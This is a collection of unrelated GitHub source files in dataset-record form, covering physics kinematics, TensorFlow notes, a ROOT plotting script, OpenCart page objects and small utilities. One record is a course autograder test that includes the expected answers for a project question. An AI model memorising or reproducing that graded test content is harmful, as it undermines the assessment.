((Phi_invm_DisTran - Phi_invm_min) /\n (Phi_invm_max - Phi_invm_min)) * 2 - 1\n\n self.F_invm_tran = ((self.F_invm - self.F_invm_min) /\n (self.F_invm_max - self.F_invm_min)) * 2 - 1\n\n Kp_at_F_fmd = particle_att_utils.Lorentz_trans(\n self.F_fmd, self.F_Kp_fmd) # four monmentum data for Kp at f Frame\n Kp_at_Phi_fmd = particle_att_utils.Lorentz_trans(\n self.Phi_fmd, self.Phi_Kp_fmd)\n\n # Kp_theta_at_F = particle_att_utils.get_theta(Kp_at_F_fmd)\n Kp_phi_at_F = particle_att_utils.get_phi(Kp_at_F_fmd)\n Kp_F_pz = torch.unsqueeze(Kp_at_F_fmd[:, 2], dim=1)\n self.Kp_theta_at_F_trans = Kp_F_pz / particle_att_utils.get_p(\n Kp_at_F_fmd)\n self.Kp_phi_at_F_trans = Kp_phi_at_F / torch.pi\n\n # Kp_theta_at_Phi = particle_att_utils.get_theta(Kp_at_Phi_fmd)\n Kp_phi_at_Phi = particle_att_utils.get_phi(Kp_at_Phi_fmd)\n Kp_Phi_pz = torch.unsqueeze(Kp_at_Phi_fmd[:, 2], dim=1)\n self.Kp_theta_at_Phi_trans = Kp_Phi_pz / particle_att_utils.get_p(\n Kp_at_Phi_fmd)\n self.Kp_phi_at_Phi_trans = Kp_phi_at_Phi / torch.pi\n\n def forward(self):\n self.getFreeAttr()\n self.conver()\n feature = torch.stack([\n self.Phi_phi_tran, self.Phi_theta_tran, self.Phi_invm_tran,\n self.F_invm_tran, self.Kp_phi_at_F_trans, self.Kp_theta_at_F_trans,\n self.Kp_phi_at_Phi_trans, self.Kp_theta_at_Phi_trans\n ],\n dim=1)\n return feature.squeeze(dim=-1).detach().cpu().numpy()\n\n\ndef calculate_invm_2d(momentum):\n return (momentum[:, 3]**2 - np.sum(momentum[:, :3]**2, axis=1))[:, None]\n\n\ndef distribution_transform_fun(x, d, e, a, b): return (\n (np.sinh(d * np.arcsinh(x) - e)) - a) / b\n\n\ndef distribution_inv_transform_fun(x, d, e, a, b): return np.sinh(\n (e + np.arcsinh(b * x + a)) / d)\n\n\nclass particle_att_utils:\n\n @staticmethod\n def get_theta(momentum):\n return torch.arccos(momentum[:, 2][:, None] /\n particle_att_utils.get_p(momentum))\n\n @staticmethod\n def get_phi(momentum):\n return torch.atan2(momentum[:, 1], momentum[:, 0])[:, None]\n\n @staticmethod\n def get_p(momentum):\n return torch.sqrt(\n torch.sum(momentum[:, :3]**2, dim=1, keepdim=True) + epsilon)\n\n @staticmethod\n def get_pt(momentum):\n return torch.sqrt(\n torch.sum(momentum[:, :2]**2, dim=1, keepdim=True) + epsilon)\n\n @staticmethod\n def get_P(momentum):\n return momentum[:, :3]\n\n @staticmethod\n def get_E(momentum):\n return momentum[:, -1][:, None]\n\n @staticmethod\n def get_invm(momentum):\n return momentum[:, 3][:, None]**2 - torch.sum(\n momentum[:, :3]**2, dim=1, keepdim=True)\n\n @staticmethod\n def get_all_att(momentum):\n return particle_att_utils.get_theta(\n momentum), particle_att_utils.get_phi(\n momentum), particle_att_utils.get_p(\n momentum), particle_att_utils.get_pt(\n momentum), particle_att_utils.get_P(\n momentum), particle_att_utils.get_E(momentum)\n\n @staticmethod\n def get_all_att_include_invm(momentum):\n return particle_att_utils.get_theta(\n momentum\n ), particle_att_utils.get_phi(momentum), particle_att_utils.get_p(\n momentum), particle_att_utils.get_pt(\n momentum), particle_att_utils.get_P(\n momentum), particle_att_utils.get_E(\n momentum), particle_att_utils.get_invm(momentum)\n\n @staticmethod\n def get_lorentz_transformation_static_to_moving_velocity(\n momentum): # 返回值是负数\n return -(particle_att_utils.get_p(momentum) /\n (particle_att_utils.get_E(momentum) + epsilon))[:, 0]\n\n @staticmethod\n def get_lorentz_static_to_moving_rotation_config(momentum):\n \"\"\"\n p = particle_att_utils.get_p(momentum)\n cz = momentum[:, 1][:, None] / p\n sz = torch.sqrt(1 - cz ** 2)\n sy = - momentum[:, 2][:, None] / (sz * p)\n cy = - momentum[:, 0][:, None] / (sz * p)\n \"\"\"\n p = particle_att_utils.get_p(momentum)[:, 0]\n cz = momentum[:, 1] / (p + epsilon)\n sz = torch.sqrt(1 - cz**2 + epsilon)\n sy = -momentum[:, 2] / (sz * p + epsilon)\n cy = -momentum[:, 0] / (sz * p + epsilon)\n return cz, sz, sy, cy\n\n @staticmethod\n def lorentz_transformation(momentum, v):\n beta = v\n gamma = 1 / torch.sqrt(1 - beta**2 + epsilon)\n E = gamma * (momentum[:, 3] - beta * momentum[:, 1])\n Py = gamma * (momentum[:, 1] - beta * momentum[:, 3])\n new_momentum = torch.stack([momentum[:, 0], Py, momentum[:, 2], E],\n dim=1)\n return new_momentum\n\n @staticmethod\n def rotation(momentum, cz, sz, sy, cy):\n px = cz * momentum[:, 0] - sz * momentum[:, 1]\n py = sz * momentum[:, 0] + cz * momentum[:, 1]\n pz = sy * px + cy * momentum[:, 2]\n px = cy * px - sy * momentum[:, 2]\n new_momentum = torch.stack([px, py, pz, momentum[:, 3]], dim=1)\n return new_momentum\n\n @staticmethod\n def pdk(a, b, c):\n lam = (a + b + c) * (a - b + c) * (a + b - c) * (a - b - c)\n return torch.sqrt(lam + epsilon) / (2 * a + epsilon)\n\n @staticmethod\n def get_static_E(a, b, c):\n return (a**2 + b**2 - c**2) / (2 * a + epsilon)\n\n @staticmethod\n def distribution_transform(x, d, e, a, b):\n return ((torch.sinh(d * torch.arcsinh(x) - e)) - a) / (b + epsilon)\n\n @staticmethod\n def distribution_inv_transform(x, d, e, a, b):\n return torch.sinh((e + torch.arcsinh(b * x + a)) / (d + epsilon))\n\n @staticmethod\n def Lorentz_trans(f_phi_fmd, Kp_fmd):\n # f_phi_fmd is the four_monmentum_data of our purpose center-of-mass frame\n E = particle_att_utils.get_E(f_phi_fmd)[:, 0]\n vx = f_phi_fmd[:, 0] / (E + epsilon)\n vy = f_phi_fmd[:, 1] / (E + epsilon)\n vz = f_phi_fmd[:, 2] / (E + epsilon)\n px0 = Kp_fmd[:, 0]\n py0 = Kp_fmd[:, 1]\n pz0 = Kp_fmd[:, 2]\n E0 = Kp_fmd[:, 3]\n\n v = -particle_att_utils.get_lorentz_transformation_static_to_moving_velocity(\n f_phi_fmd)\n # beta = v\n gamma = 1 / torch.sqrt(1 - v**2 + epsilon)\n\n px = (1 + (gamma - 1) * (vx**2 / (v**2 + epsilon))) * px0 + (\n gamma - 1) * (vx * vy / (v**2 + epsilon)) * py0 + (gamma - 1) * (\n vx * vz / (v**2 + epsilon)) * pz0 - gamma * vx * E0\n py = (1 + (gamma - 1) * (vy**2 / (v**2 + epsilon))) * py0 + (\n gamma - 1) * (vy * vz / (v**2 + epsilon)) * pz0 + (gamma - 1) * (\n vy * vx / (v**2 + epsilon)) * px0 - gamma * vy * E0\n pz = (1 + (gamma - 1) * (vz**2 / (v**2 + epsilon))) * pz0 + (\n gamma - 1) * (vz * vx / (v**2 + epsilon)) * px0 + (gamma - 1) * (\n vz * vy / (v**2 + epsilon)) * py0 - gamma * vz * E0\n E = -gamma * (vx * px0 + vy * py0 + vz * pz0 - E0)\n return torch.stack([px, py, pz, E], dim=1)\n\n def Lorentz_inv_trans(f_phi_fmd, Kp_fmd):\n # f_phi_fmd is the four_monmentum_data of our purpose center-of-mass frame\n E = particle_att_utils.get_E(f_phi_fmd)[:, 0]\n vx = f_phi_fmd[:, 0] / (E + epsilon)\n vy = f_phi_fmd[:, 1] / (E + epsilon)\n vz = f_phi_fmd[:, 2] / (E + epsilon)\n px0 = Kp_fmd[:, 0]\n py0 = Kp_fmd[:, 1]\n pz0 = Kp_fmd[:, 2]\n E0 = Kp_fmd[:, 3]\n\n v = -particle_att_utils.get_lorentz_transformation_static_to_moving_velocity(\n f_phi_fmd)\n # beta = v\n gamma = 1 / torch.sqrt(1 - v**2 + epsilon)\n\n px = (1 + (gamma - 1) *\n (vx**2 / (v**2 + epsilon))) * px0 + (gamma - 1) * (\n (vx * vy) / (v**2 + epsilon)) * py0 + (gamma - 1) * (\n (vx * vz) / (v**2 + epsilon)) * pz0 + gamma * vx * E0\n py = (1 + (gamma - 1) *\n (vy**2 / (v**2 + epsilon))) * py0 + (gamma - 1) * (\n (vy * vz) / (v**2 + epsilon)) * pz0 + (gamma - 1) * (\n (vy * vx) / (v**2 + epsilon)) * px0 + gamma * vy * E0\n pz = (1 + (gamma - 1) *\n (vz**2 / (v**2 + epsilon))) * pz0 + (gamma - 1) * (\n (vz * vx) / (v**2 + epsilon)) * px0 + (gamma - 1) * (\n (vz * vy) / (v**2 + epsilon)) * py0 + gamma * vz * E0\n E = gamma * (vx * px0 + vy * py0 + vz * pz0 + E0)\n return torch.stack([px, py, pz, E], dim=1)\n\n\nif __name__ == '__main__':\n import numpy as np\n\n device = 'cuda:1'\n torch.set_default_dtype(torch.float64)\n target_data = np.load('../../datasets/Momentum_kk.npy').astype(np.float64)\n\n getFreeQuan = GetFreeQuantities(target_data)\n freequan = np.squeeze(getFreeQuan())\n np.save('../../datasets/Momentum_kk_free.npy', freequan)\n \"\"\"\n x = torch.tanh(torch.randn(4, 8, 1024, dtype=torch.float64))\n expand_obj = ExpandFreeQuantities(3, target_data, device='cpu')\n result = expand_obj(x, return_four_momentum=True)\n np.save('result.npy', result.detach().cpu().numpy())\n\n free_result = expand_obj(freequan, return_four_momentum=True)\n np.save('free_result.npy', free_result.detach().cpu().numpy())\n \"\"\"\n\n # re_fmd = expand_obj(freequan.reshape(500000,8), return_four_momentum=True)\n # np.save('tmp.npy', expand_obj(freequan, return_four_momentum=True))\n # print(re_fmd.shape)\n # print(target_data.shape)\n # print(freequan.shape)\n # np.savetxt('3.txt', np.array(re_fmd.reshape(500000,16)-target_data))\n # np.savetxt('target_data.txt', np.array(target_data))\n # np.savetxt('re_fdm.txt', np.array(re_fmd.reshape(500000,16)))\n # np.savetxt('frequan.txt', np.array(freequan.reshape(500000,8)))\n","repo_name":"caihao/SWD-EvtGen","sub_path":"src/utils/kinematics.py","file_name":"kinematics.py","file_ext":"py","file_size_in_byte":26749,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"16"} +{"seq_id":"20853014507","text":"test = { 'name': 'q1_9',\n 'points': None,\n 'suites': [ { 'cases': [ { 'code': \">>> isinstance(chains_growth, bpd.DataFrame) and list(chains_YOY.columns) == ['Rank', 'Restaurant', 'Sales', 'YOY_Sales', 'Segment_Category', \"\n \"'Sales_2019'] # Make sure chains_YOY remains unchanged.\\n\"\n 'True',\n 'hidden': False,\n 'locked': False},\n { 'code': \">>> np.all(chains_growth.get('Growth_Category').take(np.arange(10)) == np.array([3, 1, 5, 3, 4, 2, 2, 1, 5, 4]))\\nTrue\",\n 'hidden': False,\n 'locked': False}],\n 'scored': True,\n 'setup': '',\n 'teardown': '',\n 'type': 'doctest'}]}\n","repo_name":"dsc-courses/dsc10-2023-wi","sub_path":"projects/midterm_project/tests/q1_9.py","file_name":"q1_9.py","file_ext":"py","file_size_in_byte":952,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"16"} +{"seq_id":"10138650450","text":"import string\n\nimport numpy as np\n\nshift = ['null']\nlalphabet = list(string.ascii_lowercase)\nualphabet = list(string.ascii_uppercase)\npriority = np.concatenate((shift, lalphabet, ualphabet))\n\nallGroups = []\ndata = []\nwith open('/home/drene/Coding/Advent2022/day3/input3.txt') as f:\n data = f.readlines()\ngroupmod = int(len(data)/3)\nfor (i, d) in enumerate(data):\n data[i] = d.strip()\nfor i in range(groupmod):\n group = []\n for j in range(3):\n group.append(data[i*3+j])\n allGroups.append(group)\n\n\ndef evalRS(group):\n rs1 = [*group[0]]\n rs2 = [*group[1]]\n rs3 = [*group[2]]\n badge = 'null'\n for char in rs1:\n if (char in rs2 and char in rs3):\n badge = char\n break\n return np.where(priority == badge)[0][0]\n\n\ntotalPrio = 0\nfor group in allGroups:\n totalPrio += evalRS(group)\nprint(totalPrio)\n","repo_name":"davidreneuw/Advent2022","sub_path":"day3/rucksacks.py","file_name":"rucksacks.py","file_ext":"py","file_size_in_byte":861,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"10613319688","text":"import re\n\nfrom bs4 import BeautifulSoup\n\nfrom ..debug import debug, debugFun, debugOnlyThisMethod\nfrom ..tag import tagContent\n\n\ndef addEnclose(content):\n return tagContent(\"enclose\", content=content)\n\n\ndef removeEnclose(html):\n assert \"enclose\" in html\n step = html\n step = re.sub(r\".*<enclose>(.*)</?enclose>.*\",\n r\"\\1\", step, flags=re.M | re.DOTALL)\n step = re.sub(r\"^ \", \"\", step, flags=re.M)[1:-1]\n return step\n\n\ndef soupFromTemplate(template):\n \"\"\"Return the soup, with enclose encompassing everything to ensure it's valid xml\"\"\"\n r = BeautifulSoup(template, \"html.parser\")\n #r= BeautifulSoup(addEnclose(template), \"html.parser\")\n return r\n\n\n@debugFun\ndef templateFromSoup(soup, prettify=True):\n \"\"\"Return the text, from soup, with enclose removed. Assuming no other\n enclose tag appear in prettify.\"\"\"\n debug(\"\"\"templateFromSoup(\"{soup}\",\"{prettify}\")\"\"\", 1)\n if prettify:\n debug(\"Using Prettify\")\n ret = soup.prettify()\n if not ret:\n return \"\"\n if ret[-1] == \"\\n\":\n ret = ret[:-1]\n return ret\n #text = soup.prettify()\n else:\n debug(\"Using str\")\n # debug(\"\"\"soup as text is \"{text}\".\"\"\")\n # assert prettify or \"\\n\" not in text\n # text= removeEnclose(text)\n # debug(\"\"\"soup as text without enclosed is \"{text}\" \"\"\")\n # assert prettify or \"\\n\" not in text\n # return text\n","repo_name":"Arthur-Milchior/anki-template-card-type","sub_path":"templates/soupAndHtml.py","file_name":"soupAndHtml.py","file_ext":"py","file_size_in_byte":1432,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"16"} +{"seq_id":"14132770522","text":"import os\nimport platform\ncbstate = \"\"\n\nif platform.system() == \"Windows\":\n windowsos = True\n mydir = r'C:\\Users\\Richard\\chessreal4\\images' + \"\\\\\"\n stockfishexe = r'C:\\Program Files\\Stockfish\\stockfish.exe'\n cameraportno = 1\n cameraportno = 0\n #cameraportno = 'http://192.168.1.189:8080/video'\n serialport = \"COM3\"\nelse:\n windowsos = False\n mydir = \"/home/pi/chessreal4/images/\"\n serialport = '/dev/ttyACM0'\n\n","repo_name":"rpd123/chess-robot","sub_path":"version1-old/CBstate.py","file_name":"CBstate.py","file_ext":"py","file_size_in_byte":439,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"16"} +{"seq_id":"37573398328","text":"import re\n\nfrom oct.pages.base.elements import Block, Element, Link, Clickable\nfrom oct.pages.base.page import BasePage\n\n\nclass ButtonGroup(Block):\n\n contains = {\n \"reorder\": {\"locator\": (\"CLASS_NAME\", \"btn-primary\"), \"class\": Clickable},\n \"return_product\": {\"locator\": (\"CLASS_NAME\", \"btn-danger\"), \"class\": Link},\n }\n\n\nclass OrderTableRow(Block):\n\n contains = {\n \"product_name\": {\"locator\": (\"CSS_SELECTOR\", \"td:nth-child(1)\"), \"class\": Element},\n \"model\": {\"locator\": (\"CSS_SELECTOR\", \"td:nth-child(2)\"), \"class\": Element},\n \"quantity\": {\"locator\": (\"CSS_SELECTOR\", \"td:nth-child(3)\"), \"class\": Element},\n \"price\": {\"locator\": (\"CSS_SELECTOR\", \"td:nth-child(4)\"), \"class\": Element},\n \"total\": {\"locator\": (\"CSS_SELECTOR\", \"td:nth-child(5)\"), \"class\": Element},\n \"actions\": {\"locator\": (\"CSS_SELECTOR\", \"td:nth-child(6)\"), \"class\": ButtonGroup},\n }\n\n\nclass OrderTable(Block):\n\n contains = {\n \"rows\": {\n \"locator\": (\"XPATH\", '//*[@id=\"content\"]/div[1]/table/tbody'),\n \"class\": OrderTableRow,\n \"is_loaded\": True,\n }\n }\n\n\nclass Summary(Block):\n\n contains = {\n \"subtotal\": {\n \"locator\": (\"CSS_SELECTOR\", \"tr:nth-child(1) > td:nth-child(3)\"),\n \"class\": Element,\n },\n \"flat_shipping_rate\": {\n \"locator\": (\"CSS_SELECTOR\", \"tr:nth-child(2) > td:nth-child(3)\"),\n \"class\": Element,\n },\n \"total\": {\n \"locator\": (\"CSS_SELECTOR\", \"tr:nth-child(3) > td:nth-child(3)\"),\n \"class\": Element,\n },\n }\n\n\nclass OrderHistory(Block):\n\n contains = {\n \"date_added\": {\"locator\": (\"CSS_SELECTOR\", \"td:nth-child(1)\"), \"class\": Element},\n \"status\": {\"locator\": (\"CSS_SELECTOR\", \"td:nth-child(2)\"), \"class\": Element},\n \"comment\": {\"locator\": (\"CSS_SELECTOR\", \"td:nth-child(3)\"), \"class\": Element},\n }\n\n\nclass OrderInfoPage(BasePage):\n\n url = \"index.php?route=account/order/info&order_id=\"\n\n def __init__(self, order_id: int):\n super().__init__()\n self.url = f\"{self.url}{order_id}\"\n\n contains = {\n \"order_details\": {\n \"locator\": (\"XPATH\", '//*[@id=\"content\"]/table[1]/tbody'),\n \"class\": Block,\n },\n \"payment_address\": {\n \"locator\": (\"XPATH\", '//*[@id=\"content\"]/table[2]/tbody/tr/td[1]'),\n \"class\": Block,\n },\n \"shipping_address\": {\n \"locator\": (\"XPATH\", '//*[@id=\"content\"]/table[2]/tbody/tr/td[2]'),\n \"class\": Block,\n },\n \"orders\": {\n \"locator\": (\"XPATH\", '//*[@id=\"content\"]/div[1]/table/tbody'),\n \"class\": OrderTable,\n },\n \"summary\": {\n \"locator\": (\"XPATH\", '//*[@id=\"content\"]/div[1]/table/tfoot'),\n \"class\": Summary,\n },\n \"order_history\": {\n \"locator\": (\"XPATH\", '//*[@id=\"content\"]/table[3]/tbody'),\n \"class\": OrderHistory,\n },\n \"continue_btn\": {\"locator\": (\"XPATH\", '//*[@id=\"content\"]/div[2]/div/a'), \"class\": Link},\n }\n\n def get_order_details(self) -> dict:\n\n raw = re.sub(\"\\n\", \" \", self.order_details.text)\n reg_ex = re.compile(\n r\"Order ID: (.*) Date Added: (.*) Payment Method: (.*) Shipping Method: (.*)\"\n )\n match = [i for i in reg_ex.search(raw).groups()]\n\n return {\n \"order_id\": match[0],\n \"date_added\": match[1],\n \"payment_method\": match[2],\n \"shipping_method\": match[3],\n }\n\n def get_payment_address_details(self) -> list:\n return self.payment_address.text.split(\"\\n\")\n\n def get_shipping_address_details(self) -> list:\n return self.shipping_address.text.split(\"\\n\")\n","repo_name":"ITA-Dnipro/dp-195-taqc-python","sub_path":"oct/pages/models/order_info_page.py","file_name":"order_info_page.py","file_ext":"py","file_size_in_byte":3788,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"37377472183","text":"\"\"\"\r\n14. 텐서플로의 구조 자세히 알아보기 (14.1 ~ 14.3)\r\n14.2 - Tensor의 rank, shape\r\n14.3 - tf.constant <-> numpy.array\r\n tf.reshape, tf.transpose(perm), tf.split, tf.concat\r\n\r\n14.4 - tf1 <-> tf2의 차이 (graph 관점)\r\n14.5 - tf.Variable (.numpy() = np type)\r\n - tf.Variable.assign(value)\r\n\r\n\"\"\"\r\n#===== Tensorflow 사용시 발생하는 메시지 숨기기 =====#\r\n# import os\r\n# os.environ['TF_CPP_MIN_LOG_LEVEL'] = '2'\r\nfrom default import *\r\n\r\n\r\n\"\"\"\r\n14.2. Rank of Tensor\r\n\"\"\"\r\n#===== Tensorflow의 차원 구하는 방법(rank, shape) =====#\r\n\r\n# scalar - 0차원 텐서 (rank-0 tensor)\r\n# vector - 1차원 텐서 (rank-1 tensor)\r\n# matrix(행렬) - 2차원 텐서 (rank-2 tensor)\r\nimport tensorflow as tf\r\nimport numpy as np\r\nprint(\"14.2\")\r\nt1 = tf.constant(np.pi) #rank-0 , size = ()\r\nt2 = tf.constant([1,2,3,4]) #rank-1, size = (4,) # [[]] 꼴이어야 (4,1)\r\nt3 = tf.constant([[1,2],[3,4]]) #rank-2, size = (2,2)\r\n\r\n#get rank of tensor\r\nr1 = tf.rank(t1)\r\nr2 = tf.rank(t2)\r\nr3 = tf.rank(t3)\r\n\r\n## 크기를 구합니다\r\ns1 = t1.get_shape()\r\ns2 = t2.get_shape()\r\ns3 = t3.get_shape()\r\nprint('크기:', s1, s2, s3)\r\n\r\nprint('랭크:', \r\n r1.numpy(), \r\n r2.numpy(), \r\n r3.numpy())\r\n\r\n\r\n\r\n\"\"\"\r\n14.3. Tensor --> numpy.array\r\n\"\"\"\r\n#===== Tensorflow constant와 numpy arr의 호환성 =====#\r\n\r\n# tensor => tf.constant(value).get_shape() # .shape도 작동함\r\n# numpy => np.array(value).shape\r\n\r\nprint(\"\\n\\n14.3\")\r\narr = np.array([[1., 2., 3., 3.5],\r\n [4., 5., 6., 6.5],\r\n [7., 8., 9., 9.5]])\r\nT1 = tf.constant(arr) #np.array를 바로 tf.constant(텐서)로 변환가능\r\nprint(T1)\r\ns = T1.get_shape()\r\n\r\n#아래 두개의 출력값 동일!! [ .get_shape() = .shape , attribute로 존재]\r\nprint('T1의 크기:', s)\r\nprint('T1의 크기:', T1.shape)\r\n\r\n\r\nT2 = tf.Variable(np.random.normal(size=s)) #get_shape로 얻은 (3,4)꼴의 input을 size로 넣어줌. np에서 제공하는 기능\r\nprint('<Value of T2>\\n',T2)\r\nT3 = tf.Variable(np.random.normal(size=s[0])) #size=3 -> (3,)과 동일!\r\nprint('<Value of T3>\\n',T3)\r\nT3_2 = tf.Variable(np.random.normal(size=(3,))) #size=(3,)\r\nprint('<Value of T3_2>\\n',T3_2)\r\n\r\n# value of T1\r\n#[[1. 2. 3. 3.5]\r\n# [4. 5. 6. 6.5]\r\n# [7. 8. 9. 9.5]], shape=(3, 4), dtype=float64)\r\n\r\n\"\"\"\r\nTensorflow를 이용한 행렬 변형 (reshape, transpose(with perm), split, concat)\r\n\"\"\"\r\n#===== tensorflow reshape =====#\r\n\r\nT4 = tf.reshape(T1, shape=[1, 1, -1])\r\nprint('<Value of T4>\\n',T4)\r\nT5 = tf.reshape(T1, shape=[1, 3, -1])\r\nprint('<Value of T5>\\n',T5)\r\n\r\n# Transpose of Matrix\r\n# Numpy에서는...\r\n# arr.T arr.transpose() np.transpose(arr)\r\n# TensorFlow에서는...\r\n# tf.transpose(arr)\r\n\r\n\r\n\r\n#===== tensorflow split =====#\r\nT_temp = tf.transpose(T1)\r\nprint('<Value of T_temp>\\n',T_temp)\r\n\r\n#T5.shape = (1,3,4)\r\nT6 = tf.transpose(T5, perm=[2, 1, 0]) # perm => 0,1,2로 입력해야함. 각각이 0-dim 1-dim 2-dim\r\nprint('<Value of T6>\\n',T6)\r\nprint('<Dim of T6>\\n',T6.shape)\r\n#T6.shape = (4,3,1)\r\nT7 = tf.transpose(T5, perm=[0, 2, 1])\r\nprint('<Value of T7>\\n',T7)\r\n#T6.shape = (1,4,3)\r\n\r\n\r\n\r\n#===== tensorflow split =====#\r\n\r\nt5_splt = tf.split(T5, \r\n num_or_size_splits=2, \r\n axis=2)\r\n# 결과는 tf tensor의 list!\r\n\r\nprinting(t5_splt) #dimension : (1,3,4) => (1,3,2)\r\n\r\n# t5_split_2 = tf.split(T5, \r\n# num_or_size_splits=2, \r\n# axis=1)\r\n# 불가능 => 열이 3개로, 2의 배수가 아니기 때문\r\nt5_splt_2 = tf.split(T5, \r\n num_or_size_splits=3, \r\n axis=1)\r\nprinting(t5_splt_2) #dimension : (1, 3, 4) => (1, 1, 4)\r\nt5_splt_2_0 = t5_splt_2[0]\r\nprint(t5_splt_2_0)\r\n\r\n\r\n\r\n#===== tensorflow concat =====#\r\n\r\nt1 = tf.ones(shape=(5, 1), dtype=tf.float32)\r\nt2 = tf.zeros(shape=(5, 1), dtype=tf.float32)\r\nprinting(t1)\r\nprinting(t2)\r\n\r\nt3 = tf.concat([t1, t2], axis=0) #행방향으로 한칸씩 진행하면서 합성(하나끝나서 진행 불가능하면 그제서야 다음꺼 concat!)\r\nprinting(t3) #즉, 행방향으로 array가 길어짐\r\nprint(t3.shape)\r\nt4 = tf.concat([t1, t2], axis=1) #��방향으로 한칸씩 진행하면서 합성(하나끝나서 진행 불가능하면 그제서야 다음꺼 concat!)\r\nprinting(t4) #즉, 열방향으로 array가 길어짐\r\nprint(t4.shape)\r\n","repo_name":"prorata12/ML-self-study","sub_path":"Chapter14/ch14_1.py","file_name":"ch14_1.py","file_ext":"py","file_size_in_byte":4330,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"8765203696","text":"import os\nimport json\n\nimport ROOT\nROOT.gROOT.SetBatch(ROOT.kTRUE)\n\nimport DevTools.Plotter.CMS_lumi as CMS_lumi\nimport DevTools.Plotter.tdrstyle as tdrstyle\n\nROOT.gROOT.ProcessLine(\"gErrorIgnoreLevel = 2001;\")\ntdrstyle.setTDRStyle()\n\nisprelim = False\nbr = 0.0005\n\ndef floatToText(x):\n s = '{:.1E}'.format(x).split('E')\n return '{} #times 10^{{{}}}'.format(int(float(s[0])),int(s[1]))\n\ndef get_rooplot(tfile,name,doUnc):\n # get the postfit result\n rooplot = tfile.Get(name)\n fittree = tfile.Get('tree_fit_sb')\n fittree.GetEntry(0)\n \n # remove things we dont want\n # rooplot.remove(\"name\")\n objToRemove = []\n objs = []\n for i in range(7):\n obj = rooplot.nameOf(i)\n o = rooplot.getObject(i)\n objs += [obj]\n if 'pdf' in obj and not ('Comp' in obj or 'errorband' in obj):\n objToRemove += [obj]\n if not doUnc and 'errorband' in obj:\n objToRemove += [obj]\n # scale the signal to desired br\n if 'Sig' in obj:\n for j in range(o.GetN()):\n if fittree.r: o.GetY()[j] *= br/(fittree.r * 0.001)\n for obj in objToRemove:\n rooplot.remove(obj)\n\n return rooplot\n \n\ndef plot(h,a,dim,region,mode,doUnc):\n var = 'CMS_haa_{}'.format(dim)\n if region=='control': var += '_control'\n fname = 'temp_fitDiagnostics/{h}_{a}/fitDiagnostics.Test.root'.format(h=h,a=a)\n\n tfile = ROOT.TFile.Open(fname)\n\n rooplot = get_rooplot(tfile,'{}_{}_{}'.format(region,var,mode),doUnc)\n \n canvas = ROOT.TCanvas('c','c',50,50,800,600)\n canvas.SetRightMargin(0.05)\n \n rooplot.Draw()\n mi = rooplot.GetMinimum()\n if mi<0:\n rooplot.SetMinimum(0.1)\n \n if 'x' in var:\n rooplot.GetXaxis().SetTitle('m(#mu#mu) (GeV)')\n rooplot.GetYaxis().SetTitle('Events / 0.2 GeV')\n if a<8.5: \n rooplot.GetXaxis().SetRangeUser(2.5,8.9)\n canvas.SetLogy()\n rooplot.SetMaximum(2000)\n if a>8.5 and a<11.5:\n rooplot.SetMaximum(60)\n if a>11.5:\n rooplot.SetMaximum(15)\n if region=='control': rooplot.GetYaxis().SetTitle('Events / 0.02 GeV')\n else:\n rooplot.GetXaxis().SetTitle('m(#mu#mu#tau_{#mu}#tau_{h}) (GeV)')\n rooplot.GetYaxis().SetTitle('Events / 20 GeV')\n rooplot.GetXaxis().SetRangeUser(0,800)\n canvas.SetLogy()\n rooplot.SetMaximum(2000)\n if region=='control':\n rooplot.SetMaximum(1e6)\n rooplot.SetMinimum(100)\n \n \n CMS_lumi.cmsText = 'CMS'\n CMS_lumi.writeExtraText = isprelim\n CMS_lumi.extraText = 'Preliminary'\n CMS_lumi.lumi_13TeV = \"%0.1f fb^{-1}\" % (35.9)\n CMS_lumi.CMS_lumi(canvas,4,11)\n \n \n legend = ROOT.TLegend(0.4,0.6,0.92,0.92)\n legend.SetTextFont(42)\n legend.SetBorderSize(0)\n legend.SetFillColor(0)\n #legend.SetNColumns(2)\n \n foundSig = False\n foundObs = False\n for prim in canvas.GetListOfPrimitives():\n if 'h_{}'.format(region) in prim.GetName():\n if foundObs: continue\n foundObs = True\n title = 'Observed'\n legend.AddEntry(prim, title, 'ep')\n elif 'Bkg' in prim.GetName():\n prim.SetLineColor(ROOT.kBlue)\n legend.AddEntry(prim, 'Background Model', 'l')\n elif 'errorband' in prim.GetName():\n prim.SetLineColor(ROOT.kOrange)\n legend.AddEntry(prim, 'Uncertainty', 'f')\n elif 'Sig' in prim.GetName():\n prim.SetLineColor(ROOT.kRed)\n if foundSig: continue\n foundSig = True\n title = '#splitline{{m_{{H}} = {} GeV, m_{{a}} = {} GeV}}{{B(h #rightarrow aa #rightarrow #mu#mu#tau#tau) = {}}}'.format(h,a,floatToText(br))\n #title = 'm_{{H}} = {} GeV, m_{{a}} = {} GeV'.format(h,a)\n legend.AddEntry(prim, title, 'l')\n \n legend.Draw()\n \n canvas.Print('haa_mm_h_{}_{}_{}_{}_{}{}.png'.format(region,var,mode,h,a,'' if doUnc else '_noUnc'))\n canvas.Print('haa_mm_h_{}_{}_{}_{}_{}{}.pdf'.format(region,var,mode,h,a,'' if doUnc else '_noUnc'))\n\nfor doUnc in [True,False]:\n for mode in ['fit_s','fit_b']:\n for h in [125,300,750]:\n for a in [7,9,15]:\n for region in ['PP','FP','control']:\n plot(h,a,'x',region,mode,doUnc)\n if region!='control': plot(h,a,'y',region,mode,doUnc)\n\n","repo_name":"red1habibullah/CombineLimitsRunII","sub_path":"Plotter/python/plot_fitDiagnostics_old.py","file_name":"plot_fitDiagnostics_old.py","file_ext":"py","file_size_in_byte":4393,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"} +{"seq_id":"11126426521","text":"# Diabetes Detector\nimport pandas as pd\nfrom sklearn.metrics import accuracy_score\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.ensemble import RandomForestClassifier\nfrom PIL import Image\n\n#!pip install -q streamlit\n\nimport streamlit as 